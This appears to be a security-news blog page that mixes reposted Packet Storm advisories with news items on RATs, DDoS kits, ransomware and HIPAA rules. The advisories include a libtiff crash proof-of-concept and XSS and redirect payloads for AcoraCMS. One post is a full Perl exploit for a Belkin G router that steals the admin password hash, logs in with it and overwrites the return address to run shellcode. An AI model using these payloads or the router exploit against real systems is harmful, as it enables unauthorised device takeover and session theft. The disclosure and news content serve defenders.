Matt

Description : libtiff versions 3.9.5 and below suffer from an integer overflow vulnerability. Author : x90c Source : libtiff 3.9.5 Integer Overflow ? Packet Storm Code : +----------------------------------------------------+ | XADV-2013001 libtiff <= 3.9.5 integer overflow bug | +----------------------------------------------------+ vulnerable versions: - libtiff 3.9.5 <= - libtiff 3.6.0 not vulnerable versions: - libtiff 4.0.3 - libtiff 4.0.2 - libtiff 4.0.1 - libtiff 4.0.0 release path: 4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched) -> 3.9.5(vulnerable) testbed: linux distro type: local impact: medium vendor: http://www.remotesensing.org/libtiff author: x90c site: x90c.org email: geinblues@gmail.com ========== abstract: ========== I discovered libtiff TIFFOpen integer overflow bug by weird TIFFOpen call success with malformed tif image file! - tiffcp tool (tiffinfo, tiff2ps, ... also can test): Many times tiffcp execution ... often, it entered to tiffcp function in tiffcp tool after tiffopen. Often calling openSrcImage success. malformed tif image within count of SamplePerPixel or RowsPerStrip can be opened by TIFFOpen even though can't tiffcp, TIFFWrite Directory with the returned TIFF* - integer overflow to heap corruption: Malformed tif image file within SamplePerPixel and RowsPerStrip can be opened the malformed tif data. and can be calculated in other library functions it leads to integer overflow to memory corruption! - exploitation: Exploit tries many times to call TIFFOpen with malformed tif file. sometimes after, the target program used vulnerable libtiff can be corrupted if these two field will passed validation checks ========= details: ========= tiff-v3.6.0/tools/tiffcp Many times TIFFOpen calls ---- .. [root@centos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif [root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@centos5 tools]# ./tiffcp -b $SAMPLE samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output Bias image must be monochrome [root@centos5 tools]# ---- As you see, malformed td_samplesperpixel(sampleperpixel field of tif image) count of 2 changes these values 1,0 to a value of sample= of 1392(0x570). the invalid value can be calculated and integer overflow! =============== exploit codes: =============== tiff_poc.c -- #include <stdio.h> #include <stdlib.h> #include <string.h> #include "tiffio.h" int tiff_integer_overflow_test(){ TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r"); int samples = 0; /* * for instance, TIFFGetField library function will * called with malicious samplesperpixel field value * TIFFGetField got segfault! */ TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples); printf("tiff_poc: tif samplesperpixel field=%d\n", samples); } -- - I attached the sample_spp.tif: http://www.x90c.org/exploits/sample_spp.tif ============= patch codes: ============= tiff-4.0.3/tools/tiffcp (latest version) ---- TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@centos5 tools]# .... .. ... .. ---- safe! ============== vendor status: ============== 2013/08/24 - I discovered the security bug 2013/08/24 - the advisory released

The Poison Ivy Remote Access Tool (RAT) - often considered a tool for novice "script kiddies" - has become a ubiquitous feature of cyber-espionage campaigns, according to experts. Research by malware protection firm FireEye has revealed that the tool served as lynchpin of many sophisticated cyber attacks, including the compromise of RSA SecurID data in 2011 and the "Nitro" assault against chemical makers, government offices, defence firms and human-rights groups last year. A Peeping Tom webcam sextortionist has been jailed for six years in the US after targeting several young women in attacks that relied on a modified version of Poison Ivy, an incident which shows that the tool has malign uses beyond cyber-espionage. Poison Ivy remains popular and effective eight years after its original release. FireEye has compiled a list of nation state-type attackers making use of the utility. These include a group called admin@338, which specialises in attacks targeting the financial services industry; th3bug, who have been hammering universities and healthcare facilities since 2009, and menuPass, a group that has run cyberespionage attacks against defence contractors over the last four years. Poison Ivy is the preferred RAT of several threat actors located in China. Over recent months other attackers elsewhere in the world have begun adopting the same methodology. A campaign by a Middle East hacking group called “Molerats” (AKA Gaza Hackers Team) switched during June and July to using Poison Ivy to attack Israeli government targets. The latest malware was signed with a fake Microsoft certificate, similar to earlier attacks using the XtremeRat trojan. FireEye has also intercepted Egyptian- and Middle Eastern-themed attacks using decoy content in Arabic whose targets remain uncertain but may include targets in the Palestinian authority. "The cyber attacks against Israeli and Palestinian targets that were first documented last year are ongoing," FireEye concludes. "The attackers, which we have called 'Molerats', have also targeted government entities in the UK and in the US. In addition to using XtremeRAT, which is popular among Middle Eastern attackers, we have found that Molerats have adopted the use of Poison Ivy RAT, which is traditionally favoured by Chinese attackers." "We do not know if this is an intentional attempt by MoleRats to deflect attribution to China-based threat actors, or if they have simply added another, effective, publicly-available RAT to their arsenal. However, this development should raise a warning flag for those who attribute all Poison Ivy attacks to threat actors based in China. The ubiquity of off-the-shelf RATs makes determining positive attribution an increasing challenge," it adds. More details on the Molerats' cyber-espionage campaign can be found in a blog post, featuring diagrams, screen shots and charts, and put together by three FireEye researchers (Nart Villeneuve, Ned Moran and Thoufique Haq) here. "You can download the default version of Poison Ivy from poisonivy-rat.com," explained FireEye's Ned Moran. "However, each of these groups are using a custom version of Poison Ivy. We do not believe these specific custom versions are available for sale." RATs such as Poison Ivy require little technical savvy while offering unfettered access to compromised machines, hence their use by even well resourced professional cyber-ninja types. It can be considered as the easy to use front end of attacks that might be actually quite sophisticated when viewed as a whole. "They [RATs] are often delivered as a key component of coordinated attacks that use previously unknown (zero-day) software flaws and clever social engineering," explained Darien Kindlund, manager of threat intelligence at FireEye in a blog post. "Attackers can point and click their way through the target’s network to steal data and intellectual property," using tools such as Poison Ivy, he added. FireEye released its a white paper on its research into the hacker tool along with Calamine, a set of free tools to help organisations to detect possible Poison Ivy infections. ® Source TheRegister.co.uk

AV-Comparatives.org a dat publicitatii o evaluare complexa a suitelor de securitate pentru Android. Au fost evaluate 16 programe in ceea ce priveste protectia impotriva furtului, protectia anti-malware, impactul asupra bateriei si caracteristicile incluse in fiecare produs in parte. Incepand cu impactul asupra duratei de viata a bateriei, toate produsele s-au descurcat foarte bine (pana la 3% consum), cu exceptia Qihoo si Webroot. In al doilea rand, au fost scanate un unmar de 2947 de aplicatii infectate, iar testul a fost realizat pe data de 23 iulie 2013. Iata care a fost clasamentul aici: 1. AhnLab, Kingsoft – 99.9% 2. Kaspersky – 99.7% 3. Baidu, ESET – 99.6% 4. BitDefender – 99.4% 5. avast! – 99.0% ……. 11. Lookout – 96.0% 12. Trend Micro – 95.6% 13. Qihoo – 93.6% 14. Ikarus – 91.0% A treia parte si cea mai interesanta este o analiza completa a fiecarui produs testat in parte, cu avantajele si dezavantajele sale. Majoritatea celor care detin un smartphone incep sa-l foloseasca precum un PC: documente, navigare pe internet, tranzactii bancare etc. De aceea pericolele devin similare: furt de date, infectie malware, atacuri phishing. Astfel este foarte importanta utilizarea unei solutii robuste de securitate. Pentru detalii complete despre acest test accesati: AV-Comparatives Mobile-Review

Security researchers have discovered a malicious website posing as a legitimate YouTube page that uses social engineering, drive-by downloads and ransomware to lock a visitor's machine in an attempt to extort money from the victim. The attack site uses porn to lure victims but then combines the attacks, bringing a victims system to a grinding halt, said Jerome Segura, a senior security researcher at San Jose, Calif.-based Malwarebytes. In his analysis of the activity, Segura said all three stages are classic attacks designed to spread malware, hijack a victim's system and steal account credentials. Combining the attacks is out of the ordinary, he wrote. "To me, the best attacks are those that are stealth and remain on a system for long periods of time," Segura wrote. "I wonder if the crooks behind this attack were just too greedy or perhaps wanted to test how good the 'conversion rates' would be." [Related: Antivirus Firms: Whitelisting Malware For Law Enforcement Against Policy] The attack begins when the site prompts a visitor to download and install a phony Flash Player update. Once downloaded, the victim's system is immediately locked up and rebooting is futile, Segura said. A phony porn archive then tricks visitors into downloading fake Windows Media videos that deliver additional malware to the victim's system. The second stage is an HTML-based ransomware attack, which makes it difficult to shut down the browser. Using malicious JavaScript, an attempt to click away from the page will open a long line of frustrating pop-up messages, Segura said. The attack is similar to previously discovered FBI ransomware campaigns that display a phony violation message from law enforcement, demanding payment of a fine to remove the message. The final stage is a stealthy infection that exploits an older browser Java plugin vulnerability. The delivered malware attempts to steal data. Malicious code that attempts to lock up the browser or a victim's system has been a trending attack technique. Attackers had been tricking victims with fake antivirus software, but they have turned to browser-based hijacking because it has worked so well, said Aleks Gostev, chief security expert at Kaspersky Lab. In a recent interview with CRN, Gostev said the vast majority of attacks are being carried out by financially motivated cybercriminals attempting to steal credit card data and account credentials. "Millions of people can be infected without complex malware," Gostev said. "There is no real need for sophisticated methods because the current methods are working well." The latest threat report from McAfee also found that ransomware has been increasing. The number of new samples in the second quarter of 2013 was greater than 320,000, more than twice as many as the previous period, McAfee said. Unlike fake antivirus software, which attempts to collect payment via credit card, ransomware uses anonymous payment services, making it more difficult for law enforcement and security researchers to track down, McAfee said. Citadel and other popular attack toolkits make it even easier to carry out ransomware attacks, the firm said. Using a combination of attacks is a poor way to carry out a campaign because it makes it easier for antivirus software and network security appliances to detect a suspicious problem, said Malwarebytes' Segura. "This multipronged attack is not representative of what we would normally see in the wild," Segura wrote. Source CRN.COM

An attack toolkit notorious for being a coveted weapon of political hacktivists and other cybercriminals has gotten new functionality that could enable it to slip a torrent of malicious packets past DDoS mitigation appliances. The Dirt Jumper DDoS toolkit, called Drive, now has functionality to test network ports for the use of known techniques that sample traffic for malicious activity, according to Jason Jones, a research analyst at Arbor Networks. In an analysis of Dirt Jumper obtained by CRN that's expected to be released Tuesday, Jones said the latest version "raises the bar for DDoS malware." Jones, of the Arbor Security Engineering and Response Team, said the latest update to the toolkit is significant. "We expect that this is just the first of many pieces of malware to attempt to incorporate these bypass techniques," Jones wrote in his analysis. "This is one ... the first pieces of DDoS malware that ASERT has seen actively attempt to defeat known mitigation techniques." [Related: 5 Reasons DDoS Attacks Are Gaining Strength] The new "Smart Attack" functionality sends out an attack packet that looks for the cookie value or location data set by DDoS mitigation techniques and uses a technique in the next packet it sends to try to slip past the sensors as legitimate traffic. Jones said the attack has been seen in one sample, but he said it would likely become more common. The attackers built in two other techniques. A "long attack" attempts to keep a network socket open for an extended period to flood as much data as it can into the pipeline. A "byte attack" and an ICMP attack allow for sending smaller payloads. Dirt Jumper Drive also has a strong internal engine that attempts to contact more than a dozen command-and-control servers once a system is infected, according to Jones. The Dirt Jumper toolkit is believed to originate from Russia. It has been publicly available in underground hacking forums and used since 2009. In previous attacks observed by Arbor Networks, cybercriminals launched DDoS campaigns against a large corporation's load balancer and a Russian electronic trading platform. Malware authors have been busy making improvements to Dirt Jumper over the years and recently boosted the malware's internal engine and made improvements in how its command-and-control servers respond to analysts trying to probe them, said Richard Henderson, a security strategist at Fortinet's FortiGuard Threat Research and Response Labs. Henderson told CRN that up until now, Dirt Jumper has been easy to detect, but the problem with Dirt Jumper is not preventing a bot from infecting the corporate network, but preventing already infected bots outside the network from attacking online assets. "I think this is likely the initial or testing stages of a premium DDoS attack kit that will be sold to a very small number of buyers," Henderson said. "We've seen with some premium exploit kits in the past year; there continues to be a very good market out there for people willing to pay incredible amounts of money for tailor-made and exclusive kits." Dirt Jumper has been seen targeting banks and other financial institutions. A report issued by Dell (NSDQ:Dell) SecureWorks connected the Dirt Jumper attack toolkit to a series of unauthorized wire transfers and noted that it may have drained at least one account of more than $2 million. Attackers are using a technique to test the effectiveness of Dirt Jumper against the bank's IT teams. Security researchers and law enforcement have observed short-lived burst of traffic from Dirt Jumper and, if effective, a full attack carried out, followed by an unauthorized wire or Automated Clearing House (ACH) transfer out of a compromised account, according to Dell SecureWorks. Attacks have resulted in money being funneled to banks in Russia, Cyprus and China. In these cases, attackers then launder the funds at various locations, including two known locations in Eastern Europe, Dell SecureWorks said. Source CRN.COM

Bit9 Chief Security Officer Nick Levay has been at the job for only three months, but he told CRN that he already has added staff and is executing against a priority list to bolster security procedures and infrastructure at the whitelisting vendor. Levay, who joined Waltham, Mass.-based Bit9 in June, served six years at the Center for American Progress, a Washington, D.C., think tank, where he was director of technical operations and information security. Levay said that organization was targeted daily by sophisticated attacks, putting him in a good position to address security operations at Bit9, which suffered a high-profile data breach. "I have a lot of initiatives and projects under way," Levay told CRN. "There is a mixture of maturing our infrastructure, building out the way our [security operations center] operates and maturing procedures for handling things. It's a lot of stuff." [Related: Verizon Analysis: Top 10 Causes Behind Data Breaches] The whitelisting vendor revealed the data breach in February. The firm provided details about the breach, which began with a SQL injection attack, a common Web-based attack that targets the back-end system that services company websites. The company said once attackers got in, they were able to install a back door and, due to an "operational deficiency," the malware was able to execute because the company's whitelisting software wasn't installed on some systems. The breach struck at the heart of the company's intellectual property, giving attackers access to digital code-signing certificates. They then used the certificates to target Bit9 customers. In the hands of attackers, the code-signing certificates enabled malware to execute on systems protected by the vendor's whitelisting software. At least three firms were attacked using the stolen certificates before Bit9 revoked them. The company reportedly released details to antivirus vendors regarding more than two dozen malware types created using the stolen certificates. Levay declined to discuss specifics but said much of the work he is overseeing was prompted by the data breach. "I'm really building out best practices in how we run our [security operations center] and we handle our operations," he said. "Before I even got here, a lot of very good actions were taken in the wake of the breach to ensure that the types of deficiencies that led to the breach would not occur again," Levay said. "There is a degree of which that I have been taking what has already been started, maturing it and taking the additional steps." Levay promises to talk at length publicly about his work at Bit9 "farther down the road." Until then, he said he was hiring additional security staff and streamlining some processes to gain control and oversight over operations. "The security within Bit9 is something that is taken very seriously across the board coming from the executive management level all the way down," Levay said. "We are really maturing how we approach everything and taking a fresh look at how we approach everything." Levay said his work at the Center for American Progress involved addressing an environment under constant attack. User awareness training was critical because employees in various roles from workers in the national security group or researchers on foreign policy, climate or trade, were likely to be targeted by spearphishing attacks, particularly from state actors, Levay said. "We were under constant attack and onslaught," Levay said. "Not a week went by where there wasn't another attack that we were monitoring." In 2009 the Center for American Progress reported that it suffered a data breach following a sophisticated attack on its systems. In a breach notification letter (.PDF) sent to the Maryland Attorney General's office, the organization said the names and Social Security numbers of current and former employees were exposed. The attackers impacted both the Center for American Progress and its Action Fund. Levay said he was lucky enough to find two or three respected people within the organization who took security seriously and within a year, a strong security culture had been instilled within the organization. If employees had any doubt about the validity of email content, they would send it to the IT staff for analysis. "If you are lucky enough to get one of those situations that's the kind of thing that can push an awareness program over the line," Levay said. "You have to find champions within the organization." Source CRN.COM

Organizations handling healthcare data have a month to comply with new security and privacy requirements under the Health Information Technology for Economic and Clinical Health (HITECH) Act. After Sept. 23, all covered entities, including online storage vendors and cloud service providers, will be subject to new breach notification standards and limitations on how they can use and disclose PHI. They will also be required to ensure that their business associates and subcontractors are compliant with the privacy and security requirements of the Health Insurance Portability and Accountability Act (HIPAA). The HITECH Act amended portions of HIPAA by adding new security and privacy provisions on patient information. In addition, covered entities will be required to have updated patient privacy notices in place that state the patient's rights over the data and how the data can be used and shared. Unlike the original HIPAA privacy and security rules, which primarily applied to healthcare organizations and insurance companies, the new HIPAA Omnibus rules apply to business associates and their subcontractors. Under the omnibus rules, a business associate of a healthcare provider, such as a cloud service provider, is directly liable for protecting any patient data it handles, even if the vendor is just storing the data. Business associates are also liable for ensuring that any subcontractor it hires, such as a document-shredding company, is similarly protecting PHI. The new rules for safeguarding PHI create a complex liability chain, said Peter MacKoul, president of consulting firm HIPAA Solutions LC. A covered entity or a business associate could face stiff civil penalties for a breach by a subcontractor, regardless of how far down the chain the subcontractor might be, he said. Under Omnibus HIPAA rules, covered entities and business associates are directly responsible for protecting against the use of PHI by employees, contract workers, trainees and even unpaid volunteers and interns, MacKoul noted. The rules also give healthcare organizations and business associates less latitude to determine when to make a breach notification, he said. Previously, a healthcare organization needed to notify individuals of a data breach only if there was a serious risk of financial or reputational harm. Under the new requirements, covered entities and business associates will be required to issue a breach notification in most cases, unless they can specifically show there is a "low probability" of the breached data being misused, MacKoul said. Healthcare companies will be required to consider four specific factors, including the nature of the data that was breached and whether PHI was acquired or viewed only, to determine the seriousness of a breach. Importantly, breach notification requirements can be triggered even if an employee, contractor or unpaid volunteer uses PHI in an impermissible manner, he said. Healthcare entities need to identify all their business associates, especially newly covered entities such as data storage companies, and ensure they have proper business associate agreements with them by Sept. 23, said William Maruca, a partner with Fox Rothschild LLP. Healthcare companies also must have updated patient privacy notices in place by the deadline, Maruca said. The notice must specifically state that the covered entity is required to obtain the patient's authorization to use or sell his or her information for marketing or other purposes and to use or disclose psychotherapy notes, Maruca said. Privacy notices will also need to include a description of how an individual can revoke an authorization and explain their right to receive a notification in the event of a data breach, Maruca said. "I think the readiness level varies considerably," Maruca noted. "Larger health systems and similar organizations with dedicated health privacy officers may be ahead of the curve, and some savvy smaller entities have been very proactive," he said. But "others are dragging their feet. I think it may take a high-profile enforcement ... to get the attention of the smaller players." Deborah Peel, founder and chairman of the advocacy group Patient Privacy Rights , noted that while the changes are designed to improve patient privacy, several loopholes remain. Despite the changes, most health data can still be sold, she said. There is also no chain of custody for health data despite the generally strong security and contract requirements for business associates and subcontractors, Peel said. As a result there is no way for patients "to obtain a complete map or picture of who used your health information or why. Without a complete data map that tracks all flows of data, we have no idea about the harms and misuses, making it impossible to weigh the risks vs. benefits of using," health information technology systems, she noted. Source ComputerWorld.Com

Description : CM3 AcoraCMS versions 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, and 5.5.0/1b-p1 suffer from cross site request forgery, cross site scripting, information disclosure, weak cookies, and URL redirection vulnerabilities. Author : Pedro Andujar Source : CM3 AcoraCMS XSS / CSRF / Redirection / Disclosure ? Packet Storm Code : =============================== - Advisory - =============================== Tittle: CM3 AcoraCMS - Several Vulnerabilities Risk: Medium Date: 12.Sept.2012 Author: Pedro Andujar Twitter: @pandujar .: [ INTRO ] :. Acora CMS is a sleek and powerful off-the-shelf content management application coupled with a deep and extensible advanced website development framework at a killer price. This home grown product is one of DDSN's key differentiators. It's in use by many high profile clients, but easily scales down for smaller websites too. AcoraCMS is widely used accross Austalian IT companies, Banks and government websites. .: [ TECHNICAL DESCRIPTION ] :. AcoraCMS, v6.0.6/1a, v6.0.2/1a, v5.5.7/12b, v5.5.0/1b-p1 (and probably others), are prone to several security issues as described below; .: [ ISSUE #1 }:. Name: Reflected Cross Site Scripting Severity: Medium CVE: CVE-2013-4722 Due to lack of input validation and output escaping in the default.asp page, parameters such username, url, qstr, etc. can be used by an attacker to perform XSS attacks. Example: /AcoraCMS/Admin/login/default.asp?username="</div><script>alert(document.cookie)</script> /AcoraCMS/Admin/login/default.asp?url="</form><META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.google.es"> .: [ ISSUE #2 }:. Name: URL Redirect Severity Medium CVE: CVE-2013-4723 URL redirection functionality doesn't verify that VirtualPath are relatives. Example: /AcoraCMS/track.aspx?m=1&l=//www.google.es .: [ ISSUE #3 }:. Name: Username and password sent in clear text Severity: Medium Authentication credentials (username and password) and session cookies are unencrypted. .: [ ISSUE #4 }:. Name: Cookie Lack of Hardening Severity: Low CVE: CVE-2013-4724 & CVE-2013-4725 Cookies are not hardened using HttpOnly or Secure flags. .: [ ISSUE #5 }:. Name: XSRF Severity: Low CVE: CVE-2013-4726 The application lacks controls to prevent Cross Site Request Forgery. .: [ ISSUE #6 }:. Name: Information Leaks Severity: Low CVE: CVE-2013-4727 & CVE-2013-4728 * Unauthenticated users are able to retrive _viewstate encoded base64 information. /AcoraCMS/Admin/top.aspx <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /> </div> Once decoded gives you information about the version and license including the company who owns the license, it could be used for fingerprinting the application: -486210519 d f d d d f Text $DigitalSec Networks Websited Enterprised v5.4.5/4a-cdd Anonymous (Public Internet User)d VisiblehdddÒq ^er ( * Application Physical Path exposed to unauthenticated users /AcoraCMS/track.aspx?m=1&l=..\.. Exception Details: System.Web.HttpException: Cannot use a leading .. to exit above the top directory. Source File: d:\Path\to\site\AcoraCMS\track.aspx.cs Line: 57 .: [ CHANGELOG ] :. * 12/Sep/2012: - Vulnerability discovered. * 27/May/2013: - Vendor contacted. No response * 19/Aug/2013: - Vendor recontacted. No response * 26/Aug/2013: - Public .: [ SOLUTIONS ] :. N/A .: [ REFERENCES ] :. [+] Acora CMS http://www.ddsn.com/knowledge-base/cm3-acora-cms.aspx [+] Clients & Projects http://www.ddsn.com/portfolio/clients.aspx [+] CM3CMS http://www.cm3cms.com/ [+] !dSR - Digital Security Research http://www.digitalsec.net/

Description : Cisco IronPort Security Management Appliance M170 version 7.9.1-030 suffers from cross site scripting and cross site request forgery vulnerabilities. Author : Pedro Andujar Source : Cisco Ironport Cross Site Request Forgery / Cross Site Scripting ? Packet Storm Code : =============================== - Advisory - =============================== Tittle: Cisco IronPort Security Management Appliance - Multiple issues Risk: Medium Date: 20.May.2013 Author: Pedro Andujar Twitter: @pandujar .: [ INTRO ] :. The Cisco Security Management Appliance helps to enable flexible management and comprehensive security control at the network gateway. Is a central platform for managing all policy, reporting, and auditing information for Cisco web and email security appliances. .: [ TECHNICAL DESCRIPTION ] :. Cisco IronPort Security Management Appliance M170 v7.9.1-030 (and probably other products), are prone to several security issues as described below; .: [ ISSUE #1 }:. Name: Reflected Cross Site Scripting Severity: Low CVE: CVE-2013-3396 There is a lack of output escaping in the default error 500 page. When a exception occurs in the application, the error description contains user unvalidated input from the request: ** PoC removed as requested by Cisco. ** .: [ ISSUE #2 }:. Name: Stored Cross Site Scripting Severity: Medium Due to a lack of input validation on job_name, job_type, appliances_options and config_master parameters which are then printed unscapped on job_name, old_job_name, job_type, appliance_lists and config_master fields. ** PoC removed as requested by Cisco. ** .: [ ISSUE #3 }:. Name: CSRF Token is not used Severity: Low CVE: CVE-2013-3395 CSRFKey is not used in some areas of the application, which make even easier to exploit Reflected XSS Issues. In the /report area of the application, we got no error even when completely removing the parameter CSRFKey; ** PoC removed as requested by Cisco. ** See: http://tools.cisco.com/security/center/viewAlert.x?alertId=29844 .: [ ISSUE #4 }:. Name: Lack of password obfuscation Severity: Low When exporting the configuration file even if you mark the "mask password" option, the SNMPv3 password still appears in cleartext. .: [ CHANGELOG ] :. * 20/May/2013: - Vulnerability found. * 27/May/2013: - Vendor contacted. * 11/Jul/2013: - Public Disclosure .: [ SOLUTIONS ] :. Thanks to Stefano De Crescenzo (Cisco PSIRT Team), because of his professional way of managing the entire process. Stored XSS CSCuh24755 Reflected XSS http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3396 SNMP password issue CSCuh27268, CSCuh70314 CSRF http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3395 .: [ REFERENCES ] :. [+] Cisco Content Security Management Appliance M170 http://www.cisco.com/en/US/products/ps12503/index.html [+] Cisco Security Advisories http://tools.cisco.com/security/center/publicationListing.x [+] !dSR - Digital Security Research http://www.digitalsec.net/ -=EOF=-

Description : Belkin G Wireless Router remote code execution proof of concept exploit. Author : Aodrulez Source : Belkin G Wireless Router Code Execution ? Packet Storm Code : +-----------------------------------+ | Belkin G Wireless Router RCE PoC. | +-----------------------------------+ Firmware Version : 5.00.12 (Sep 10 2009 19:54:12) Boot Version : 1.18 Hardware : F5D7234-4 v5 (01) Author : Aodrulez. Email : atul.alex@orchidseven.com Twitter : http://twitter.com/Aodrulez +---------+ | Details | +---------+ The exploit works in 3 stages. 1. Authentication. 2. Setting up shellcode in the memory at a known location. 3. Triggering an RA register over-write to execute the shellcode. This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot. Video Demo : http://www.youtube.com/watch?v=MtrYs-f6X3E +---------+ | Exploit | +---------+ #!/usr/bin/perl use strict; use warnings; use LWP 5.64; $| = 1; # Variable declarations. my $browser = LWP::UserAgent->new; my $passHash=""; my $url =""; my $response =""; my $ip=""; $browser ->timeout(10); # Just a few nops followed by a dummy shellcode that crashes & reboots the router. my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20"; sub Authenticate() { print "[+] Trying to authenticate.\n"; $url= "http://$ip/login.stm"; $response = $browser->get( $url); my @aod= $response->content =~ m/var password = "(.*)";/g; if(!$aod[0]) { print "[-] Damn! Something went wrong. This might not work here \n"; exit; } else { $passHash=$aod[0]; print "[+] Admin Password = $passHash (MD5 Hash).\n"; } print "[+] Time to authenticate you!\n"; $url = "http://$ip/cgi-bin/login.exe"; $response = $browser->post( $url, [ 'totalMSec' => "1377121454.99", 'pws' => "$passHash", ,] ); if( $response->content =~ /index/ ) { print "[+] Logged in successfully as 'Admin'!\n"; print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n"; } else { print "[-] Login failed! This might not work here \n"; exit; } print "\n[+] Continue with exploitation? (Y/N) : "; my $temp=<STDIN>; if ($temp=~"Y" || $temp=~"y") { Exploit(); } else { print "[+] Have fun!\n\n"; exit; } } sub Exploit() { # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes) # 0x803c0278 is fixed for this device/firmware combination. print "[+] Stage 1 : Allocating shellcode.\n"; if (length($shellcode) > 120) { print "[-] Shellcode is too big! (120 bytes Max)\n"; exit; } print "[+] Shellcode length : ".length($shellcode)."\n"; # Fill the rest with nops. Not needed but good to have. # Shellcode size should be ideally a multiple of 4 as this is MIPS. my $nopsize=120-length($shellcode); $shellcode=$shellcode.("\x20"x$nopsize); $url = "http://$ip/cgi-bin/wireless_WPA.exe"; $response = $browser->post( $url, [ 'wpa_authen' => "1", 'wpa_psk' => '0', 's_rekeysec' => '900000', 's_rekeypkt' => '1000', 'w802_rekey' => '0', 'encryption' => '3', 'security_type' => '4', 'authentication' => '3', 'encryption_hid' => '3', 'wpa_key_text' => "ssss", 'wpa_key_pass' => "$shellcode", 'obscure_psk' => '1', 'sharedkey_alter' => '', 'sharedkey_alter1' => '1', ,] ); if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here \n"; } else { print "[+] Stage 1 seems to have gone well.\n"; } # Stage 2: Trigger Stack Overflow & overwrite RA print "[+] Stage 2 : Triggering Return Address overwrite.\n"; my $junk="A"x32; my $s0="BBBB"; my $s1="CCCC"; my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination. my $nop="\x20\x20\x20\x20"; my $payload=$junk.$s0.$s1.$ra.$nop; $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe"; $response = $browser->post( $url,[ 'pin' => "$payload"]); if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here \n"; } else { print "[-] Done! \\m/\n"; } } sub Welcome() { print "\n\n+------------------------------------------+\n"; print "| Belkin G Wireless Router Remote Exploit |\n"; print "| (Authentication bypass & RCE PoC) |\n"; print "+------------------------------------------+\n"; print "[+] By Aodrulez.\n"; print "\n[+] Usage : perl $0 router_ip"; print "\n[!] Example : perl $0 192.168.2.1"; if (!$ARGV[0]) { print "\n[-] (o_0) Seriously??\n"; exit; } $ip=$ARGV[0]; print "\n[+] Target IP : $ip\n"; } # Burn!! Welcome(); Authenticate(); # End of exploit code. +-------------------+ | Greetz Fly Out To | +-------------------+ 1] Amforked() : My Mentor. 2] The Blue Genius : My Boss. 3] str0ke (milw0rm) 4] www.orchidseven.com 5] www.malcon.org 6] www.nsd.org.in +-------+ | Quote | +-------+ “I would rather die of passion than of boredom.” - Vincent van Gogh.

Description : Wi-fEye is designed to help with network penetration testing. It allows the user to perform a number of powerful attack automatically including WEP/WPA cracking, session hijacking and more. Author : Zaid Al-Quraishi Source : Wi-fEye Wireless Pentesting Tool 1.0 Beta ? Packet Storm Download : HERE

